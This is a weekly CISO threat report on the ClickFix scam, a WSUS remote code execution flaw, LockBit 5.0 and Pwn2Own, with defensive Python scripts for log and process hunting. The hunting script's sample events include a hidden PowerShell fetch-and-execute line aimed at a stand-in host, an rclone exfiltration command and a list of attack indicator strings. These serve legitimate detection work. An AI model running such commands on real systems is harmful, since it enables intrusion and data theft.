
Weekly Report: New Hacking Techniques and Critical CVEs 22 Oct – 28 Oct, 2025

This week saw high-impact technical threats: WSUS servers actively exploited, LockBit ransomware’s upgraded return, dozens of new zero-days unveiled at Pwn2Own Ireland, advanced social engineering campaigns (ClickFix), and major underground coordination—each demanding proactive CISO action.


New Hacking Techniques

ClickFix Fullscreen Update Scam (Oct 27)

Attackers present a convincing fullscreen fake Windows Update page, gated behind a CAPTCHA, that silently writes a command to the clipboard. Victims are coached to open the Run dialog and paste it, which launches a PowerShell one-liner that fetches the Rhadamanthys infostealer. The payload chain uses an AMSI bypass, RC4-encrypted stages, and scheduled tasks for persistence. The campaign relies on the browser-to-shell process chain (chrome.exe → powershell.exe), which is also its most reliable detection signal.

CISO Takeaway

Restrict PowerShell to signed scripts (AllSigned execution policy backed by AppLocker or WDAC, since execution policy alone is not a security boundary), remove the Run dialog for standard users via the "Remove Run menu from Start Menu" Group Policy (NoRun), and alert on powershell.exe or cmd.exe spawned by browser processes.

Critical Attack Techniques & CVEs

  1. CVE-2025-59287: WSUS RCE
    (Out-of-band patch: Oct 23, 2025, CVSS 9.8)

Unauthenticated remote code execution via unsafe deserialization in the WSUS SOAP endpoints (ClientWebService and ReportingWebService). Attacker-controlled data is decrypted with AES-128-CBC using a zero IV and then handed to .NET BinaryFormatter, which yields code execution as SYSTEM. Public proof-of-concept code was weaponized within days of the out-of-band patch, and exploitation in the wild was confirmed.

CISO Takeaway

Install the out-of-band update now and reboot, remove WSUS ports 8530/8531 from internet exposure, hunt for powershell.exe or cmd.exe spawned by wsusservice.exe or the IIS worker w3wp.exe, and segment WSUS servers into their own VLAN with outbound traffic limited to Microsoft Update.
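Checking whether a WSUS server has been reached from outside the perimeter is a quick first triage step. The following is an added example (not the page's or Microsoft's own tooling) that parses IIS W3C logs and flags POSTs to the WSUS SOAP endpoints on 8530/8531 from non-internal source addresses. The log lines are constructed for the example, the endpoint paths are the WSUS defaults, and the "internal" ranges are an assumption (RFC 1918 plus loopback and link-local) that you should extend with your own public allocations.

```python
"""Flag WSUS SOAP endpoint requests from non-internal addresses in IIS W3C logs.
Added example with constructed log lines; adapt INTERNAL_NETS to your environment."""
import ipaddress
from typing import Dict, Iterator, List, Tuple

# WSUS web services served by IIS on 8530 (HTTP) / 8531 (HTTPS); default virtual paths.
WSUS_PATHS = {
    "/clientwebservice/client.asmx",
    "/reportingwebservice/reportingwebservice.asmx",
    "/simpleauthwebservice/simpleauth.asmx",
}
WSUS_PORTS = {8530, 8531}

# Assumption: anything outside these ranges is treated as external. TEST-NET
# documentation ranges are deliberately NOT excluded here so the sample below
# exercises the external path; do not use ipaddress.is_private for this check,
# because it classifies 203.0.113.0/24 and friends as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, using the most recent '#Fields:' header as keys."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):  # skip truncated or malformed records
            continue
        yield dict(zip(fields, values))


def is_external(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable c-ip (e.g. '-') is not evidence of exposure
    return not any(addr in net for net in INTERNAL_NETS)


def find_exposed_wsus_requests(text: str) -> List[Tuple[str, str, str, str, str]]:
    """Return (timestamp, client ip, method, uri, status) for external hits on WSUS endpoints."""
    findings = []
    for rec in parse_w3c(text):
        uri = rec.get("cs-uri-stem", "").lower()
        try:
            port = int(rec.get("s-port", "0"))
        except ValueError:
            continue
        if port in WSUS_PORTS and uri in WSUS_PATHS and is_external(rec.get("c-ip", "")):
            findings.append((
                f"{rec.get('date')} {rec.get('time')}",
                rec["c-ip"], rec.get("cs-method", ""), uri, rec.get("sc-status", ""),
            ))
    return findings


# Constructed sample log: two internal update-agent requests, one loopback request,
# one external content download, and two external POSTs to the SOAP endpoints.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2025-10-24 03:12:41 10.0.5.20 POST /ClientWebService/Client.asmx - 8530 - 10.0.7.31 Windows-Update-Agent/10.0 200 31
2025-10-24 03:13:02 10.0.5.20 POST /ClientWebService/Client.asmx - 8530 - 203.0.113.77 python-requests/2.32 200 1872
2025-10-24 03:13:05 10.0.5.20 POST /ReportingWebService/ReportingWebService.asmx - 8530 - 203.0.113.77 python-requests/2.32 500 45
2025-10-24 03:14:10 10.0.5.20 GET /Content/aa/bb.cab - 8530 - 198.51.100.9 Windows-Update-Agent/10.0 200 12
2025-10-24 03:15:00 10.0.5.20 POST /ClientWebService/Client.asmx - 8530 - 127.0.0.1 Windows-Update-Agent/10.0 200 9
"""

if __name__ == "__main__":
    for finding in find_exposed_wsus_requests(SAMPLE_LOG):
        print(*finding)
```

Any hit from this script means the WSUS web services were reachable from outside, which is the precondition the page's takeaway tells you to remove. A non-update-agent User-Agent and a long time-taken on Client.asmx, as in the constructed 203.0.113.77 lines, are worth pulling the matching w3wp.exe child-process telemetry for.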

  2. LockBit 5.0 Ransomware (Oct 22–23)

LockBit returns with ESXi/Linux/Windows support, randomized file extensions, anti-analysis, and advanced encryption (ChaCha20+RSA). Affiliates use defrag.exe for process hollowing, enhanced self-spread, and aggressive double-extortion tactics.

CISO Takeaway

Harden ESXi (patch, lockdown mode, SSH disabled, no direct management from user VLANs), regularly test restores from backups including cloud copies, alert on defrag.exe launched from unexpected parents and on any Rclone execution, and enforce MFA on remote access and admin accounts.
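The three takeaways above (ClickFix, CVE-2025-59287 and LockBit 5.0) all reduce to parent/child process hunting. The block below is an added example, not code from the page or any vendor, that evaluates those rules over constructed Sysmon Event ID 1-style records: shells spawned by browsers, shells spawned by wsusservice.exe or the IIS worker w3wp.exe, suspicious PowerShell command-line flags, Rclone execution, and defrag.exe with a parent other than the assumed benign set. The indicator lists and the defrag.exe parent baseline are assumptions to tune for your estate.

```python
"""Process-chain hunt covering ClickFix, CVE-2025-59287 and LockBit 5.0 indicators.
Added example; ProcEvent records below are constructed, not real telemetry."""
import ntpath
from typing import List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    host: str
    image: str          # full path of the new process (Sysmon 'Image')
    parent_image: str   # full path of its parent (Sysmon 'ParentImage')
    cmdline: str        # Sysmon 'CommandLine'


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# wsusservice.exe is the parent the page names; w3wp.exe is the IIS worker that
# hosts the WSUS web services and the other parent Microsoft's guidance lists.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
# Assumed benign parents for defrag.exe (scheduled optimisation runs under svchost.exe).
DEFRAG_OK_PARENTS = {"svchost.exe", "explorer.exe", "mmc.exe"}
# Command-line fragments typical of pasted ClickFix one-liners (assumed indicator list).
SHELL_FLAGS = ("-enc", "-ep bypass", "-executionpolicy bypass", "-w hidden",
               "-windowstyle hidden", "iex ", "invoke-expression", "downloadstring")


def name(path: str) -> str:
    """Lower-cased file name from a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> List[str]:
    child, parent, cmd = name(ev.image), name(ev.parent_image), ev.cmdline.lower()
    hits = []
    if child in SHELLS and parent in BROWSERS:
        hits.append("clickfix: shell spawned by browser")
    if child in SHELLS and parent in WSUS_PARENTS:
        hits.append("cve-2025-59287: shell spawned by WSUS service/worker")
    if child in SHELLS and any(flag in cmd for flag in SHELL_FLAGS):
        hits.append("suspicious shell command line")
    if child == "rclone.exe":
        hits.append("lockbit: rclone execution (possible exfiltration)")
    if child == "defrag.exe" and parent not in DEFRAG_OK_PARENTS:
        hits.append("lockbit: defrag.exe with unexpected parent")
    return hits


def hunt(events: List[ProcEvent]) -> List[Tuple[str, str, str, str]]:
    """Return (host, parent, child, finding) for every rule that fires."""
    return [(ev.host, name(ev.parent_image), name(ev.image), hit)
            for ev in events for hit in classify(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample: five malicious-looking events and two benign ones.
SAMPLE = [
    ProcEvent("ws01", PS, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/update)"'),
    ProcEvent("wsus01", CMD, r"C:\Program Files\Update Services\Service\WsusService.exe",
              "cmd.exe /c whoami"),
    ProcEvent("wsus01", PS, r"C:\Windows\System32\inetsrv\w3wp.exe",
              "powershell -enc SQBFAFgAIAAoAE4A"),
    ProcEvent("fs02", r"C:\Tools\rclone.exe", CMD,
              r"rclone.exe copy D:\Shares remote:loot"),
    ProcEvent("ws07", r"C:\Windows\System32\defrag.exe",
              r"C:\Users\bob\AppData\Local\Temp\upd.exe", "defrag.exe C:"),
    ProcEvent("ws03", PS, r"C:\Windows\explorer.exe", "powershell.exe"),          # benign
    ProcEvent("ws03", r"C:\Windows\System32\defrag.exe",
              r"C:\Windows\System32\svchost.exe", "defrag.exe C: -o"),             # benign
]

if __name__ == "__main__":
    for host, parent, child, finding in hunt(SAMPLE):
        print(f"{host:8} {parent} -> {child}: {finding}")
```

Run against real Sysmon or EDR exports, the browser rule will fire on some legitimate extensions and installers, so treat it as a triage queue rather than an auto-block; the WSUS rule, by contrast, should be near zero on a healthy server and is worth a high-severity alert.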

  3. Pwn2Own Ireland 2025 (Oct 21–23)

Researchers demonstrated 73 unique zero-days across USB, NFC and network attack surfaces in targets including the iPhone 16, Galaxy S25, QNAP and Synology NAS devices, smart-home/IoT gear, and WhatsApp (a zero-click RCE entry was disclosed privately to the vendor rather than demonstrated on stage).

CISO Takeaway

Expedite patching for Pwn2Own target products as vendor fixes ship, isolate at-risk devices (NAS and IoT in particular) from user networks, disable USB and NFC where possible, and track ZDI advisories: details stay embargoed until a patch is available, and ZDI's policy gives vendors up to 90 days before publication.

Darkweb Threats and Underground Chatter

Ransomware Forums Consolidation & “Trinity of Chaos”

XSS, RAMP, Dread and the emerging DarkForums host LockBit affiliate recruitment, credential dumps and data-leak auctions. The "Trinity of Chaos" alliance of ShinyHunters, LAPSUS$ and Scattered Spider has launched a combined leak site and pools its tradecraft: SQL injection, vishing, MFA fatigue, and recruited insiders.

Telegram-first data marketplaces spike, AI-driven phishing and malware kits spread.

CISO Takeaway

Deploy dark-web monitoring, verify whether your vendors appear in leak-site listings, enforce credential hygiene and phishing-resistant MFA, and watch for mentions of your suppliers and your own brand in underground forums.



Priyanka Aash

Priyanka Aash is credited with building global communities for cybersecurity leaders and shaping enterprise marketing strategies for over a decade. She has been nominated for the Cybersecurity Excellence Award for her leadership & AI innovations in cybersecurity and honored with the NetApp Excellerate HER award. She is also the author of “The AI Divide,” which explores how artificial intelligence is quietly rewiring human minds and influencing decisions. Earlier, she co-founded CISO Platform, the world’s first online platform for collaboration and knowledge sharing among senior information security executives. Through this, she worked with the marketing teams of IBM, VMware, F5 Networks, Barracuda Networks, Check Point, and others, driving inbound marketing and enterprise growth. Priyanka is passionate about entrepreneurship, enterprise marketing strategy, and building communities that empower CISOs worldwide.